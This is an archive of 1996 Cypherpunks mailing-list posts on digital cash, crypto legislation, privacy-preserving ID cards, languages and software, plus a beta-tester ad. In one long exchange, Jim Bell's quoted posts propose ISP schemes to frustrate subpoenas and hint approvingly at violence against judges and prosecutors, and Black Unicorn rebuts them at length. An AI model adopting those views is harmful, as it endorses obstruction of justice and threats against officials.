> Actual currency can circulate forever in the economy without
> eventual conversion into some other kind of money.  The
> requirements of current digital cash systems for centralized
> clearing to eliminate double spending and to mint new coins tends
> to preclude the kinds of perpetual peer-to-peer transactions we
> think of when we conceptualize "currency."

Which suggests that private currencys must utilize e-cash (if at all) 
merely as monetary instruments which continue to look much like what 
exists today.  (e.g., drafts, checks, bonds...)

> Real electronic currency could be invented, but would have to
> live its life within a population of tamper-proof smart cards
> communicating with each other through secure protocols.  Whether
> anyone will bother to implement such a system remains to be seen.

I concur.

> Until then, the "check" model of digital money is, as Tim points
> out, the correct one.

I concur again.

>  > The point being that talking about "what backs up digital
>  > cash?" is misleading. (What really backs it up is the
>  > reputation of the entities, but I digress.)
> 
> "The reputation of the entities" is the only important
> consideration regardless of what the cash is denominated in. In
> most cases, the valued commodities, if they exist, are simply
> pretty window-dressing for some unseen but powerful syndicate.

Yet here I must differ.  I'm still not convinced that a legitimate 
commodity somewhat resistant to the market distortions you cite does not 
exist.  Don't ask me what it is yet, I'll have to give it some thought.

> --
>      Mike Duvos         $    PGP 2.6 Public Key available     $
>      mpd@netcom.com     $    via Finger.                      $

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@MICROSOFT.com>
Date: Fri, 29 Mar 1996 18:55:54 +0800
To: "'perry@piermont.com>
Subject: RE: What backs up digital money?
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960328202247Z-33716@red-07-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Perry E. Metzger
>
>I'd say that anything directly dealing with digital cash, its
>implications, deployment, and technical issues associated with
>it. General discussions of whether the Federal Reserve is a bunch of
>evil old men and the like are what are out of bounds.  [...etc.]
..................................................................

So you mean rather than merely, or only, complaining that things have
not, or are not, working right (in our favor, to our benefit), because
of what Evil Old Men have done to the system as it now operates, the
discussion should go in the direction of:

.  "doing something about it", or 

.  ideas on methods and techniques which would work, which could

.  make a difference (potentially, hopefully) towards the success of
techie systems which would result in greater personal, individual
control, 

also including perhaps:

.  clarifications on why, in spite of the resistance of those who are
apprehensive about the break-down of law&order, these are a "good thing"
to promote and implement (for those who don't "get it"),

.  aiming more at postive improvements and successes in the future,
rather than focusing too much on past mistakes, failures, injustices
(where the reader could wonder, "so how does this relate").

...or something like that.

   ..
>Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 29 Mar 1996 18:58:04 +0800
To: captain_lee@ns.interconnect.net
Subject: Re: PPV Descrambler
Message-ID: <2.2.32.19960328050605.00698058@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:34 AM 03/28/96 +0000, you wrote:
>I've been looking for a file on how to make PPV descramblers and havn't 
>found any. Commercial descramblers cost around $200 base price. If 
>anyone has a file on how to make them please e-mail me one.  Thanks.
>
>captain_lee @mail.interconnect.net
>

This is cypherpunks. Not Cable-TV-Piracy-Punks.

Dave Merriman
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 29 Mar 1996 18:59:51 +0800
Subject: No Subject
Message-ID: <199603291059.SAA12014@infinity.nus.sg>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have ANY code for DES or RSA encryption for use on a PIC
microcontroler?  A friend and I are developing an ASCII terminal (dumb term)
that encrypts data going to the serial port and decrypts data coming from
the serial port, so you could successfully send a message over a modem and
have it automatically encrypted\decrypted.  We have all the hardware almost
done, but we are having a hell of a time writing the code for the encryption...

Thanx in advance...
l8r,
-MeRC

merc@redrose.net -or-
merc@success.net 

-----BEGIN PGP MESSAGE-----
Version: 2.6.2

iQCVAwUAMUC05tnn3Dsf47p5AQE6AAP9E/JebLn1UtkOk41IGw/i4XHKckVcI6RH
ptBMucqx01sSTxaR8tXPmmkKjz5f3xndxepbbs6nKfoNuSaODWSirOlNvt3i1DWL
iUmB9+rUYmwwlpD7t6qyy2XzsAxO/M/nFT4ZxO8wi96nR/Rmp00LvCoK+YcjgQnj
HReyQrIl4X+ZAI0DMUCzOgAAAQQAv6IH+OnLeP+chsgwymSVKqsXHO1xwJLxs657
Cf3miDM3mNBB/qmRziQ1zHeC/nXgaGhR7eAdidL6MngDXl6+cw4Z5xXvenu5MpEW
zpZpwDK5/XwuvCIexQP2eHIb2Ms6vna7fUoaHGrrV4844KIVg+E36ZgWT1ZP2efc
Ox/junkABRGwAYe0I01pY2hhZWwgRC4gV2hpdGUgPG1lcmNAc3VjY2Vzcy5uZXQ+
sAED
=ZbPJ
-----END PGP MESSAGE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 29 Mar 1996 19:25:26 +0800
To: cypherpunks@toad.com
Subject: New crypto bill to be introduced
Message-ID: <QlKlevS00YUv4anoFX@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


At CFP today, we heard about a new crypto bill being introduced
tomorrow, which will be similar to Leahy's bill with the
crypto-being-used-in-furtherance-of-crime portion removed and an
explicit no-government-mandated-escrow provision added.

John Gilmore asked wonderful questions after the moot Supreme Court session.

We have put our "List of Shame" numbers on our nametags.
 
-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 29 Mar 1996 19:30:48 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
Message-ID: <2.2.32.19960328110922.00689c18@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:49 AM 03/28/96 -0800, frantz@netcom.com (Bill Frantz) wrote:
>I, at least, want to know something of the language of the countries I
>travel in.  Being able to get a meal or a room for the night is useful.  As
>a rock bottom minimum, I want to know the phrases: Hello, Good by, Please,
>Thank You, More beer please, and Where's the bathroom.

Indeed, I've found that pretty much covers the essentials :-)
First things I've always tried to learn in a foreign language are "please"
and "thank you".
>
>The look of pleased surprise on the face of the Budapest resident when I
>said "Thank you" to in Hungarian as he gave up his seat to me because I was
>loaded down with caving equipment is something I still treasure.
>

Sounds much similar to the reaction I got in Japan, speaking broken
Japanese. Atrocious accent, of course; abysmal grammar, and a fair share of
mispronunciation tossed in - but I was *trying*, and that counted for a _lot_.

I also have to concur with the point about the language/point-of-view
argument. I never have learned to _think_ in a foreign language (a
prerequisite for fluency, I believe :-), but have gotten sufficiently
skilled to be able to understand some of the subtleties of the languages
I've (kind of) learned.

Regarding the notoriety of British (and, yes, Americans), I met up with a
Brit in Japan who complained about the 'bloody foreigners that don't
understand proper English'. I pointed out to him that *we* were the
foreigners, and that the Japanese had a nicely organized society about the
same time that his ancestors and mine were still smearing themselves with
blue mud. That earned me an Evil Look.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVpW7MVrTvyYOzAZAQE/xQP/WhYi/LAT2M/QYJ+b2PW7sOrRg2r0ZNcU
gl3gk50RWY7AOUeEaifNM2ZWMl5oqqKSjA+eV5pnFZBlQBgrbnuzRHLi2F9IigZ6
Uu2V3/DHaTGY9ZVdWok0deU8DnkoY0W07pafggB9qpTCgqTGhU0NNOVxeWlU2HsT
6Yu9l5QduHM=
=XMSb
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Fri, 29 Mar 1996 19:32:58 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: What backs up digital money?
In-Reply-To: <199603280239.SAA15391@netcom17.netcom.com>
Message-ID: <Pine.SV4.3.91.960328181804.8987D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Gold is almost always mined for its own market value.  Whereas most 
silver reaches the market as a byproduct of tin and other base-metal
mining.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 30 Mar 1996 19:12:31 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u2ndw-0008zuC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960329185545.15388I-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Mar 1996, jim bell wrote:

> At 04:54 PM 3/29/96 -0500, Black Unicorn wrote:
> >On Fri, 29 Mar 1996, jim bell wrote:

> >
> >(Snore)  How many cases do you want me to cite that hold that the 
> >disclosure of an inquiry with the intent of evasion is conspiracy and 
> >entails criminal charges?
> 
> You _do_ have an odd way with words.  "entails" criminal charges?  Hey, they 
> can charge ANYBODY with ANYTHING, but that doesn't mean that a crime has 
> actually been committed.  Further, it isn't clear that anybody is obligated 
> to respond to a subpoena without the possibility of a court challenge, and 
> your fantasy about the cops showing up and trying to strongarm the ISP is 
> laughable at best.  

Ok, forget "entails" try "is a crime."

As for strong arming, ever see a search warrant served at a law firm or a 
trust company, or a bank?

> 
> >Do you honestly think you can evade prosecution for suborning the 
> >destruction of material evidence in a criminal trial?
> 
> Who said anything about "destruction of material evidence"?  Refusing to 
> hand over information until AFTER a court has properly responded to a 
> challenge to a subpoena is old hat to newspapers, TV stations, and other 
> media-organizations who are occasioinally served with a subpoena.  The ISP 
> need merely say, I'm challenging this subpoena in court, go away 
> motherfuckers!  ISP prepares a challenge, "CC's" ALL the affected 
> individuals, (including the person whose information is desired!),  and the 
> validity of the subpoena is tested.

What you miss are provisions for the preservation of evidence called for 
in the order during the hearing process.  The fact that you can fight a 
subpoena has no bearing what-so-ever on the fact that its a crime to 
destroy the evidence until the court rules that its non-material or 
otherwise quashes the subpoena.

I grow tired of being the source of your continuing legal education.

> My feelings exactly.  Please stop acting like a government suck-up all the 
> time.  Maybe you're paid to do it, but unless you're a plant, you're on your 
> free time now.

Anyone who knows me knows I spend all my days end arounding the 
U.S. government.  The reason you can't see that is because I don't 
threaten to murder officials, but choose the intellectual detour around 
the myopic laws instead.  I realize that, lacking the facilities to 
pursue the latter, you must resort to the former.

> >Unfortunately, by the time (in the case of domestic investigations, and 
> >foreign investigations in more compliant jurisdictions) it gets to the 
> >point where authorities are checking about, they will have walked into 
> >the ISP and personally requested the information with subpoena in hand.  
> 
> Again, you blindly assume that the subpoena can't be challenged in court.  
> It can be.  

See above.  Has no bearing on the willful destruction of evidence.

> 
> >Perhaps the ISP with the nerve to destroy material evidence in the 
> >presence of law enforcement exists,
> 
> You keep inventing these phony scenarios, building up these straw men and 
> knocking them down.  Clearly, your underlying argument is quite weak.  I 
> said nothing about "destroying evidence."

What is the function of your elusive super-secret "rosebud" warning 
then?  To tell the account holder to get a cup of coffee and call the 
prosecutor to arrange for the delivery of the sought information?

> In fact, the ISP could simply 
> encrypt everything with the target's public key, and keep it.  That's not 
> "destroying evidence," that's locking it away in such a way so that nobody 
> except the target can unlock it.

Subjecting the target to compelled discovery orders $50,000+/day 
fines, contempt charges, and incarceration for non-compliance.  This, by 
the way, regardless of the "incriminating" nature of the evidence.  Fines 
are not going to be refunded if the data/evidence is later proved immaterial.

> Ideally, this would be done automatically 
> every time a person calls his ISP, although the software to do this probably 
> doesn't exist yet.  The result would be that whenever the target was NOT 
> connected to the ISP, there would be no information on the ISP's system that 
> could be decrypted by the ISP operator.

Again, this still subjects the account holder to fines etc.  God help him 
if he can't produce the desired information.  He's likely to spend quite 
a long time in jail until the judge is convinced that he's telling the 
truth when he says "I threw away the key."
 
> This would be one of those inventive future uses of encryption, well beyond 
> plain vanilla PGP, which we must assure ourselves will be developed.  The 
> kind of thing you dread, obviously.

I don't dread it at all.  I simply recognize the limited protection it 
affords the evidence concealer.

> 
> >but I sincerely doubt this ISP will 
> >escape serious prosecution for doing it.
> 
> I sincerely doubt Unicorn will ever stop being a government suck-up.

I certainly won't endorse moronic schemes that are so out of touch with 
practical and legal reality so as to be laughable.  I will certainly not 
keep quiet when I see, yet another, misleading out-of-rectum-pulled plan 
to evade all liability in the most pervasive and coercive jurisdiction in 
the world.

Word to the wise reader:  If you're considering asset / informational 
protection from discovery or attachement, by all means consult a 
professional.  Mr. Bell's disinformation and illusions are dangerous in 
the extreme.

> > At the very least the employees 
> >of the ISP will have knowledge of this practice.  Unless it's a single 
> >person run ISP, I doubt you're going to be able to keep everyone from 
> >testifying.  What you propose is a crime in the United States, and in 
> >many foreign jurisdictions.
> 
> If an ISP's system automatically encrypts all received message's with the 
> destination's public key when received, and doesn't keep an unencrypted copy 
> around, showing up at that ISP's location with a warrant will result in ZERO 
> (ZIP, ZILCH, NEGATORI, etc) information that can be  delivered, unencrypted, 
> to the cops.

The what's the purpose of your secret-super-duper "rosebud" warning?  In 
the absence of evidence/information availability to law enforcement at 
the ISP, the account holder will be directly accountable.  Is this a 
better solution?

You've now changed the structure of your "protection" scheme four times 
to duck my criticisms.  This was the same with your inventive but 
impractical nuclear detonation scheme, and your kill-the-pigs "dead pool" 
scheme.

> >> The end result is that your foolish opinion of what the law allows will 
> >> simply become irrelevant: The government cannot mandate what it cannot 
> >> enforce, and it cannot enforce what it cannot detect.
> >
> >I have often noted that the best defense is the lack of detection in the 
> >first place. 
> 
> No, an even better defense is to make it absolutely impossible, as a matter 
> of business practice, to assist the police with any kind of an 
> investigation.

On the part of the ISP, this is possible.  A secret "rosebud" tipoff is 
not the way to do it.  Your constant encryption option is a bit better, 
but still subjects the account holder to an investigation where the ISP 
is compelled to cooperate with the authorities in secret and intercept or 
record the computing session in real time.  Your fourth scheme is thus 
reliant on the trust-worthiness of the ISP, which I have indicated, and 
you have acknowledged by your constant ranting about the abuses of the 
justice system, is dubious at best.

> Before you go off and shoot your mouth off about how evil 
> and bad that is, you need to remember that regular destruction of records is 
> an acceptable practice in any company today.

Unfortunately, records can only be completely destroyed in a pre-emptive 
way when they are of no use any longer.  This, again, ignores the 
possibility of real-time investigation or informers.

  While courts will look askance 
> at it when it does not appear to be a regular business practice (say, the 
> company gets sued today and they have a mass shredding tomorrow) there is 
> nothing wrong about regularly making past records unavailable by shredding, 
> burning, erasing, or by any other method. 

Once suit is filed there is.

> Making those records SELECTIVELY unavailable by encrypting them with 
> somebody else's public key and keeping them has probably never been tested 
> in court, but if the business contracts this ISP regularly signs have this 
> as a provision of doing business, the court can't squawk after the fact.  

No, instead, knowing of this provision, any plaintiff or prosecutor will 
apply for a TRO to preserve evidence before ever filing for a warrant.  
Review: Fines and contempt that can be leveled for non compliance on 
third parties.

> After all, the ISP might have simply erased the files, keeping them from 
> being accessed by ANYBODY, including their "owner."

This argument will go over real well in court.

> > Unfortunately this is the oft denounced "security through 
> >obscurity."  Look, I know it's fun to imagine you can thwart the 
> >authorities with impunity within the United States. 
> 
> Hey, you can FREQUENTLY "thwart the authorities."  If I have evidence of a 
> crime in my house, the cops can't come in unless they have a warrant.

Uh, not precisely so.  Lots of circumstances exist where your home can be 
searched without a search warrant.  Search of premises incident to a 
lawful arrest is just one of them.

> If I 
> know they're coming, and can destroy it untraceably, I WIN!  See, that's how 
> freedom works!  It's  nearly the exact opposite of "the government can do 
> anything it wants, any time it wants, and anybody who frustrates them is a 
> criminal!"

Yadda yadda yadda.
 
> Naturally, you won't like this.

I don't like it because it's not a solution, because it's not novel, and 
because courts, law enforcement, prosecutors and private litigants have 
thought of it already and created provisions to prevent it.

> >Unfortunately it is 
> >a fantasy.  The system you propose requires someone to be present in the 
> >ISP 24 hours a day.

[description of problems with Mr. Bell's scheme removed]

> Yet another one of your multiple problems is that you have no imagination 
> when it comes to "thwarting the authorities."  I do.  Don't try to tell me 
> what can't be done, because I'll turn around and tell you how it CAN be 
> done!  I just did.  The actual implementation waits for some slick coder to 
> do it, but I give you 5 years, tops, before it's in regular usage.  And 
> that's assuming they're all a bunch of lazy bastards.

You told me nothing.  You hedged, changed your scheme, altered the 
portions I attacked and revered to a previous scheme I had already decimated.

And you made several legal analysis errors, as usual, in the process.

> >Your last resort in all of your arguments seems to be murder, extortion, 
> >the threat of bodily harm, arson or assault, or destruction of private 
> >property.
> 
> A list which seems to be the current modus operandi of most levels of 
> government in America, today.

So you might as well murder a few people.  Why not?

> In any case, I think it's fair to hold an ISP to his word and contract.

Contracts are void to the extent they are illegal.  Obstruction is 
illegal.  Destruction of material evidence to a crime is illegal.  
Conspiracy to obstruct justice is illegal.

> If 
> the "normal" referee to such contracts (the court system) becomes biased 
> because it begins to be an interested party to the en-  "CUT!"

Yadda yadda yadda.

> >No.  I speak from experience when I say that "proof" of complicity is 
> >rarely a requirement.  The judge need only suspect wrong doing.  It's 
> >easy to levy contempt fines, and very hard to overturn them.  
> 
> It's easy to kill, and hard to resurrect the dead.
> 
> >The 
> >standard in most jurisdictions is "clearly erronious."  Tough stuff.
> 
> Yes, I'd say you're "clearly erronious."  
> 
> If you can repeatedly describe, in nominally accurate terms, how abusive the 
> government has become and NOT oppose its actions with every fiber in your 
> being, then YOU have made yourself part of the problem.

Who said I didn't oppose it?  I just don't kill people, or call for their 
death (other than by suicide) to accomplish my goals.

> >Unfortunately, fines and penalities are imposed every day based on 
> >assumptions by the trier of fact.  Go watch a major court case some time.
> 
> You still haven't given me specific examples.

My note contains many.  Consider a pair:

Unites States v. Bank of Nova Scotia, 740  F.2d 817, 832 (11th Cir. 
1984), cert. denied, 469 U.S. 1106 (1985)(upholding $25,000/day fine 
totaling $1,750,000 for failing produce documents located in the Cayman 
Islands under grand jury subpoena duces tecum; Marc Rich & Co., A.G. v. 
United States, 707 F.2d 663, 670 (2d Cir.), cert. denied, 463 U.S. 1215 
(1983)($50,000/day against Swiss corporation for noncompliance with 
subpoena duces tecum demanding documents located in Switzerland).

In both cases the documents were not shown to be material evidence when 
the fines were imposed and the judge was merely assuming they would be 
incriminating.

I don't name specific cases I have been involved in without client 
waiver, but I have myself seen larger fines for less in white collar 
crime cases.

> >> Bullets could easily fly. 
> >
> >And will.  I've seen this happen.  Trustee refuses to produce documents, 
> >court imposes compelled discovery, documents burn or are lost or have been 
> >stolen, trustee (who can be assigned no direct evidence of complicity) is 
> >fined heftily.  A case I was not personally involved in saw the judge 
> >jail the trustee for 4 months.
> 
> That's not what I'm referring to.  Judges are mortal.

Yadda yadda yadda.

> Remember that prosecutor who died in Boston a few months ago?  You 
> know, the one who made the national news?  I'm still waiting to see how 
> that one came out, but I suspect they will never be able to prove who 
> did it, and may not even be able to find out.

Parties who believe Mr. Bell might have been responsible are invited to 
call the Boston Police and provide an anonymous tip.

> >> >With Mr. Bell as a defense attorney, who needs prosecutors?
> >> 
> >> If I intended to limit myself to the tools of the court room (that's the 
> >> enemy's playpen, BTW) I would probably be just as ineffective as the next 
> >> defense attorney.
> >
> >So again, we see Mr. Bell in his basic form.  Violent offender.  He will 
> >obtain by force that which he cannot argue into his hands.
> 
> Except that in a court room, the decision maker is PAID by a party to the 
> case, the government.  That sounds like a classic conflict of interest 
> to me.

Yadda yadda yadda.

> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 29 Mar 1996 19:42:53 +0800
To: cypherpunks@toad.com
Subject: Re:  The Law Loft: Surviving the Biometric I.D. Card
In-Reply-To: <199603281944.LAA20391@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.92.960328121803.1107A-100000@elaine50.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Mar 1996, Hal wrote:

> If they really want to give people a card which proves their legal
> residence in the US, a less intrusive approach is possible.  Rather
> than set up a database of all employees, and/or give each person an
> official identity card, instead have people come and prove their residency,
> then give them a card with the biometric information and a blind signature.
> No other information goes on the card, no information goes into a
> database.  The signature is a certificate testifying that the person
> with the particular thumbprint is legal to work in the US.  The card
> can't be transferred since no one else has that thumbprint.  But no
> identifying information is recorded.  There is no advantage in people
> coming in twice to get more than one card since their print will be
> the same each time, so no database is needed.

The only problem I see with this approach (from the government's
perspective, and assuming that the only state interest is in immigration
control -- you can all stop laughing now) is that the government can't
revoke citizenship. There are several reasons they might want to do this:
an erroneous or fraudulent application, a political-driven expulsion, or a
resident-driven renunciation of citizenship (usually for tax/inheritance
reasons).

Of course, the real reason they want this proof of residency is for work
authorization, which means income tax, which means database. And heck,
since we already have a database, why not track child molesters and
deadbeat dads the same way. Or anyone else we don't like, for that matter.

The replacement of income tax with sales and real estate taxes -- despite
the fact that such a move would be incredibly regressive -- would be a
very good thing for freedom.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 29 Mar 1996 19:44:33 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Why Americans feel no compulsion to learn foreign langua
In-Reply-To: <01BB1C93.A8A24E40@jbugden.alis.com>
Message-ID: <Pine.SUN.3.92.960328102645.25073B-100000@elaine42.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Mar 1996, James Bugden wrote:

> At Thursday, March 28, 1996 12:32 AM, Timothy C. May wrote:
> >My point is not against the learning of a foreign language, just that
> >economic considerations _must_ play a role.
>
> Q: What do you call an American company that ported its internet software
> to 22 different langauges in order to compete in the world?
>
> A: Microsoft

BWAHAHAHA!!! That's a good one. Did you hear the one about the SMB
security patch affecting *two* files that was released in English on
October 20th, and for other major western languages in mid-January?

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 29 Mar 1996 19:45:50 +0800
To: Ted Anderson <cypherpunks@toad.com
Subject: Re: PolicyMaker paper available
Message-ID: <2.2.32.19960328185955.00919564@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:15 PM 3/28/96 -0500, Ted Anderson wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>"Perry E. Metzger" <perry@piermont.com> writes:
>> Huh? Postscript an "obscure printer code"?
>
>I now work from a paperless office and find postscript an "obscure
>printer code".  It has taken an annoying amount of hacking to view this
>postscript file on my PC.

A paperless office is about as useful as a paperless bathroom.

Try using Ghostscript and Ghostview.  There are versions for both 16 bit and
32 bit Windows. (As well as about every other platform on the planet.)  They
will allow you to display PostScript files to your screen, as well as print
them to non-postscript printers.  (But being a paperless office, you
probibly don't have printers...)

Information on Ghostview and GhostScript can be found at:

http://www.cs.wisc.edu/~ghost/index.html

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Anderson <ota+@transarc.com>
Date: Fri, 29 Mar 1996 19:48:49 +0800
To: cypherpunks@toad.com
Subject: Re: PolicyMaker paper available
In-Reply-To: <199603162353.SAA15330@jekyll.piermont.com>
Message-ID: <QlKgYkuSMV0_084k40@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Perry E. Metzger" <perry@piermont.com> writes:
> Huh? Postscript an "obscure printer code"?

I now work from a paperless office and find postscript an "obscure
printer code".  It has taken an annoying amount of hacking to view this
postscript file on my PC.

> The paper in question is seminal. I strongly urge people who don't
> drool when they open their mouths to read it.

On the strength of this recomendation I did the hacking and make it
available for the "convenience" of others in the same boat.

http://www.transarc.com/afs/transarc.com/public/ota/html/policymaker.html

This page consists on Matt's original message plus 10 inline gif images
of about 40Kb each.  Clumsy but effective.

Ted Anderson

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMVrJBQGojC9e/wyBAQFN3gQAvt1rX/fw76zhlsU0Td8CbBpUCc6qKoel
xCX647WovUWnyoGnjCoYYruEPiCI6QT2KUo6dpWRR1dIdZVshLCT3gsnJe5m+qRp
rQBthay+T3kk0ZQqVnwlXoLYMJoFQVBhScfxhMta/RGopzS6OYnwrAJHzET62Dgf
b0bPURYrkNA=
=ZqYX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 29 Mar 1996 19:48:55 +0800
To: cypherpunks@toad.com
Subject: Mad_Software_Disease
Message-ID: <199603282207.OAA01356@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Path: newsfeed.internetmci.com!howland.reston.ans.net!news-e2a.gnn.com!pop.gnn.com!JDonth
From: JDonth@gnn.com (Joseph L. Donth)
Newsgroups: comp.sources.testers
Subject: Beta Testers Wanted
Date: Tue, 26 Mar 1996 13:09:55
Organization: InfoBook Technology
Lines: 251
Message-ID: <4j9fer$sr1@news-e2c.gnn.com>
NNTP-Posting-Host: www-31-240.gnn.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-GNN-NewsServer-Posting-Date: 26 Mar 1996 19:10:19 GMT
X-Mailer: GNNmessenger 1.2

InfoBook Technology is looking for Beta Testers for our latest product called 
ONE-PHONE-CALL.

This post is in four parts:
1)  What does a Beta tester do?
2)  How Do I Sign-up?
3)  How do I get chosen?
4)  The product description
The product description is quite lengthy.  Feel free to bail on it when you 
have decided to be a tester or have decided not to be one.

Note: Since the program includes encryption software, we are restricting our 
testing (and possible distribution of the commercial release) to people 
living in the USA.  I will restrain from comment on governments, export 
licenses, the NSA and the like.

If you decide not to be a tester, would you drop me a post and tell me why?  
This is our second posting of this request - our goal is to have at least one 
hundred testers - so far we have less than two dozen.  If you have any 
thoughts on where else I might post this beta test request and meet with a 
favorable response please let me know that as well.  Thanks and without 
further delay...

******************************************************************************
**
What Does a Beta Tester Do?

Although we will not ask you to sign any agreements, we do ask that you honor 
the following conditions of our Beta Test Program:

1.  The software being tested is not for commercial use.  If you use it in a 
commercial fashion, you do so at your own risk.  The software may have 'bugs' 
in it.  The purpose of the beta test program is to identify those problems.

2.  Don't give copies of the software (except when authorized) to other 
people.  If you know of someone that you think might be a good beta tester, 
let us know and we will look at adding him or her to the beta list.

3.  Please let us know when you have problems with the software.  Don't 
assume that someone else has reported it.  A written response sent to  
JDONTH@GNN.COM, is the requested communication method.

4.  We also ask for comments on the whole package you received from us.  Did 
it create a good first impression?  Was it complete?  Is the User's Guide 
clear?  What would you change?   Why?

******************************************************************************
**
How Do I Sign up?

Please reply by EMail (JDonth@gnn.com) with the following information:

	1. Full Name
	2. Surface mail and preferred email address
	3. City, State and Zip code
	4. Attention Line
	5. Telephone number
	6. An "I agree to the terms of the Beta Test Program" statement
	7. Computer system information
	8. Computer expertise (optional)
	9. Experience as a Beta Tester (no previous experience is required)
	10. Why you want to test this product

******************************************************************************
**
How Do I Get Chosen?

We will be choosing testers on a first-come, first-serve basis.  You are not 
guaranteed a position as a tester of ONE-PHONE-CALL.

If you are chosen you will receive an email confirmation, followed by the 
software, sent via fist class mail.  The software will be a 30+ day version 
with all features and capabilities.  You will be sent an email questionnaire 
about 30 days after shipment of the software.  Your reply to the 
questionnaire will insure you a FREE copy of the software after it is 
released into retail sales.

If you are not chosen you will be notified by email.

If you have any questions, please contact me at JDonth@gnn.com or

			Joseph L. Donth
			InfoBook Technology
			7660 Reed Rd.
			Azle, Texas  76020

******************************************************************************
**
What is ONE-PHONE-CALL?

ONE-PHONE-CALL is a PC-based software product that enables you to transfer 
electronic information such as a program, a scanned fax, a word-processing 
document or a spreadsheet to someone, in a secure environment, with just one 
telephone call. It features a simple installation, user-friendly interface, 
mouse support, a menu system, and easy-to-remember commands.

First, Some Background

More and more of our correspondence is electronic in nature.  We use word 
processors to compose letters and reports.  We use spreadsheets to do budgets 
and financial analysis and we use accounting programs to keep track of 
everything from the corporate books to our personal checking accounts.

The power of these software tools is easily appreciated and the trend is to 
use our computers in meeting more and more of our daily needs.  What is 
lacking, however, is a simple, easy-to-use method of sharing our 
electronic information with each other. Using the facilities of fax, EMail or 
floppy disks has problems.  A fax can only transmit printed information, 
EMail is difficult to use and can be expensive, and mailing floppy disks 
is very slow.  Also, none of these methods is very secure.  The wrong people 
can read a fax, open business mail, or gain access to voice-mail or EMail 
accounts.

Now with your modem equipped computer and ONE-PHONE-CALL you can addresses 
all of these issues.

Let's illustrate with three examples:

The first example demonstrates the simplest issue: sharing electronic 
information with someone else.

You are working on a report at home and need to confer with a co-worker in 
the office.  You place a telephone call to your co-worker and discuss the 
report.  You decide he needs to see a copy of the report.

Without ONE-PHONE-CALL it might go like this:

To fax a copy of the report you might:
... Print out the report on your printer
... Dial his fax number
... Fax the report
... Call him back to tell him the fax has been sent
... Wait for him to get the fax and call you back!

The result - at least three phone calls and who knows how much time wasted in 
printing, faxing, perhaps getting busy signals and so on.

